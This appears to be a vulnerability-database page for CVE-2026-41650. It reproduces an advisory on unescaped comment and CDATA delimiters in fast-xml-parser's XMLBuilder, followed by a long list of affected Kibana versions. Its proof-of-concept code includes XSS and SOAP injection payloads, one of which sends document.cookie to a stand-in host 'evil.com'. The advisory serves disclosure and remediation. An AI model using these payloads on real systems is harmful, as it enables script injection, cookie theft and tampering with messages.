kibana - CVE-2026-41650
Back to Overview
Detailed information about this CVE

Severity

MEDIUM

Description

# fast-xml-parser XMLBuilder: Comment and CDATA Injection via Unescaped Delimiters ## Summary fast-xml-parser XMLBuilder does not escape the `-->` sequence in comment content or the `]]>` sequence in CDATA sections when building XML from JavaScript objects. This allows XML injection when user-controlled data flows into comments or CDATA elements, leading to XSS, SOAP injection, or data manipulation. Existing CVEs for fast-xml-parser cover different issues: - CVE-2023-26920: Prototype pollution (parser) - CVE-2023-34104: ReDoS (parser) - CVE-2026-27942: Stack overflow in XMLBuilder with preserveOrder - CVE-2026-25896: Entity encoding bypass via regex in DOCTYPE entities This finding covers **unescaped comment/CDATA delimiters in XMLBuilder** - a distinct vulnerability. ## Vulnerable Code **File**: `src/fxb.js` ```javascript // Line 442 - Comment building with NO escaping of --> buildTextValNode(val, key, attrStr, level) { // ... if (key === this.options.commentPropName) { return this.indentate(level) + `<!--${val}-->` + this.newLine; // VULNERABLE } // ... if (key === this.options.cdataPropName) { return this.indentate(level) + `<![CDATA[${val}]]>` + this.newLine; // VULNERABLE } } ``` Compare with attribute/text escaping which IS properly handled via `replaceEntitiesValue()`. ## Proof of Concept ### Test 1: Comment Injection (XSS in SVG/HTML context) ```javascript import { XMLBuilder } from 'fast-xml-parser'; const builder = new XMLBuilder({ commentPropName: "#comment", format: true, suppressEmptyNode: true }); const xml = { root: { "#comment": "--><script>alert('XSS')</script><!--", data: "legitimate content" } }; console.log(builder.build(xml)); ``` **Output**: ```xml <root> <!----><script>alert('XSS')</script><!----> <data>legitimate content</data> </root> ``` ### Test 2: CDATA Injection (RSS feed) ```javascript const builder = new XMLBuilder({ cdataPropName: "#cdata", format: true, suppressEmptyNode: true }); const rss = { rss: { channel: { item: { title: "Article", description: { "#cdata": "Content]]><script>fetch('https://evil.com/'+document.cookie)</script><![CDATA[more" } }}} }; console.log(builder.build(rss)); ``` **Output**: ```xml <rss> <channel> <item> <title>Article</title> <description> <![CDATA[Content]]><script>fetch('https://evil.com/'+document.cookie)</script><![CDATA[more]]> </description> </item> </channel> </rss> ``` ### Test 3: SOAP Message Injection ```javascript const builder = new XMLBuilder({ commentPropName: "#comment", format: true }); const soap = { "soap:Envelope": { "soap:Body": { "#comment": "Request from user: --><soap:Body><Action>deleteAll</Action></soap:Body><!--", Action: "getBalance", UserId: "12345" } } }; console.log(builder.build(soap)); ``` **Output**: ```xml <soap:Envelope> <soap:Body> <!--Request from user: --><soap:Body><Action>deleteAll</Action></soap:Body><!----> <Action>getBalance</Action> <UserId>12345</UserId> </soap:Body> </soap:Envelope> ``` The injected `<Action>deleteAll</Action>` appears as a real SOAP action element. ## Tested Output All tests run on Node.js v22, fast-xml-parser v5.5.12: ``` 1. COMMENT INJECTION: Injection successful: true 2. CDATA INJECTION (RSS feed scenario): Injection successful: true 4. Round-trip test: Injection present: true 5. SOAP MESSAGE INJECTION: Contains injected Action: true ``` ## Impact An attacker who controls data that flows into XML comments or CDATA sections via XMLBuilder can: 1. **XSS**: Inject `<script>` tags into XML/SVG/HTML documents served to browsers 2. **SOAP injection**: Modify SOAP message structure by injecting XML elements 3. **RSS/Atom feed poisoning**: Inject scripts into RSS feed items via CDATA breakout 4. **XML document manipulation**: Break XML structure by escaping comment/CDATA context This is practically exploitable whenever applications use XMLBuilder to generate XML from data that includes user-controlled content in comments or CDATA (e.g., RSS feeds, SOAP services, SVG generation, config files). ## Suggested Fix Escape delimiters in comment and CDATA content: ```javascript // For comments: replace -- with escaped equivalent if (key === this.options.commentPropName) { const safeVal = String(val).replace(/--/g, '&#45;&#45;'); return this.indentate(level) + `<!--${safeVal}-->` + this.newLine; } // For CDATA: split on ]]> and rejoin with separate CDATA sections if (key === this.options.cdataPropName) { const safeVal = String(val).replace(/]]>/g, ']]]]><![CDATA[>'); return this.indentate(level) + `<![CDATA[${safeVal}]]>` + this.newLine; } ```

CVSS Scores

Affected Versions

  • 9.4.0
  • 9.3.4
  • 9.3.3
  • 9.3.2
  • 9.3.1
  • 9.3.0
  • 9.2.8
  • 9.2.7
  • 9.2.6
  • 9.2.5
  • 9.2.4
  • 9.2.3
  • 9.2.2
  • 9.2.1
  • 9.2.0
  • 9.1.10
  • 9.1.9
  • 9.1.8
  • 9.1.7
  • 9.1.6
  • 9.1.5
  • 9.1.4
  • 9.1.3
  • 9.1.2
  • 9.1.1
  • 9.1.0
  • 9.0.8
  • 9.0.7
  • 9.0.6
  • 9.0.5
  • 9.0.4
  • 9.0.3
  • 9.0.2
  • 9.0.1
  • 9.0.0
  • 8.19.15
  • 8.19.14
  • 8.19.13
  • 8.19.12
  • 8.19.11
  • 8.19.10
  • 8.19.9
  • 8.19.8
  • 8.19.7
  • 8.19.6
  • 8.19.5
  • 8.19.4
  • 8.19.3
  • 8.19.2
  • 8.19.1
  • 8.19.0
  • 8.18.8
  • 8.18.7
  • 8.18.6
  • 8.18.5
  • 8.18.4
  • 8.18.3
  • 8.18.2
  • 8.18.1
  • 8.18.0
  • 8.17.10
  • 8.17.9
  • 8.17.8
  • 8.17.7
  • 8.17.6
  • 8.17.5
  • 8.17.4
  • 8.17.3
  • 8.17.2
  • 8.17.1
  • 8.17.0

Not Affected Versions

  • 8.16.6
  • 8.16.5
  • 8.16.4
  • 8.16.3
  • 8.16.2
  • 8.16.1
  • 8.16.0
  • 8.15.5
  • 8.15.4
  • 8.15.3
  • 8.15.2
  • 8.15.1
  • 8.15.0
  • 8.14.3
  • 8.14.2
  • 8.14.1
  • 8.14.0
  • 8.13.4
  • 8.13.3
  • 8.13.2
  • 8.13.1
  • 8.13.0
  • 8.12.2
  • 8.12.1
  • 8.12.0
  • 8.11.4
  • 8.11.3
  • 8.11.2
  • 8.11.1
  • 8.11.0
  • 8.10.4
  • 8.10.3
  • 8.10.2
  • 8.10.1
  • 8.9.2
  • 8.9.1
  • 8.9.0
  • 8.8.2
  • 8.8.1
  • 8.8.0
  • 8.7.1
  • 8.7.0
  • 8.6.2
  • 8.6.1
  • 8.6.0
  • 8.5.3
  • 8.5.2
  • 8.5.1
  • 8.5.0
  • 8.4.3
  • 8.4.2
  • 8.4.1
  • 8.4.0
  • 8.3.3
  • 8.3.2
  • 8.3.1
  • 8.3.0
  • 8.2.3
  • 8.2.2
  • 8.2.1
  • 8.2.0
  • 8.1.3
  • 8.1.2
  • 8.1.1
  • 8.1.0
  • 8.0.1
  • 8.0.0